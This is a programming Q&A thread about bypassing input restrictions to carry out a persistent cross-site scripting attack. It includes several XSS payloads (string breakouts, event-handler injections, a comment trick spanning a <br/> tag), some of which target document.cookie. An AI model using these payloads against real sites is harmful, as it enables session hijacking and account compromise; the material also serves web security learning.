# XSS with <script> followed by <br/>

Tags: javascript, html, xss, persistent

How do you perform a XSS attack with these limitations:

```html
[input 1] <br/> [input 2]
```

Input 1 has the following restrictions: - Only 10 characters - Unsanitized

Input 2 has the following restrictions: - "<" , ">", "&" are sanitized - No other limitations

Also, the webpage allows for persistent input, but once I open the tag, i am unable to perform additional inputs.

I have tried to do:

```html
<script> <br/> alert(document.cookie)
```

But it does not seem to work, presumably because of the br tag in there.
Any thoughts on how I should proceed?

Comment: I wonder why people downvoted this. It is very much a programming question that can be answered.

Answer (score 1):

You said:

> Input 1 has the following restrictions: - Only 10 characters - Unsanitized

If the value of this input is just reflected in the page (**without controls of the maxlength in the server side**), you can jut use your browser's developer Tools to increase the maxlength's value of the Input and then enter the payloads you want.

And then you said:

> Input 2 has the following restrictions: - "<" , ">", "&" are sanitized - No other limitations

Now it depends on where the value of this input is reflected:

If the Input parameter value is reflected in Javascript, you can try:

```
";alert('XSS');//
");alert(document.cookie);
; window.open(www.google.com);
';alert(String.fromCharCode(88,83,83))//
```

If the Input parameter value is reflected in HTML input tag or in other HTML code, you can try:

```
1? onmouseover=alert("xss"); "
"onload='confirm("test XSS")’
" onload=window.open(www.google.com)
" onload='javascript:alert(1)’
```

**XSS depends on where it is reflected!!! You have to use your brain too.**

Answer (score 0):

For example: `<script>/* <br/> */ alert(1); /*`

Comment: This does not provide an answer to the question. To critique or request clarification from an author, leave a comment below their post. - [From Review](/review/low-quality-posts/13730370)

Comment: @Liam this does indeed provide an answer to the question.

Comment: Someone has flagged this as not an answer (not me). It got sent to a review queue where I (and others) [reviewed it](http://stackoverflow.com/review/low-quality-posts/13730370). For me, this answer isn't well explained and reads like a comment. If you add more details you may avoid it getting deleted. My vote is passed now and I can't undo it but it takes several votes for an answer to be deleted. So if you correct it adequately you may avoid a deletion.Just to re-iterate, I can't alter this process any further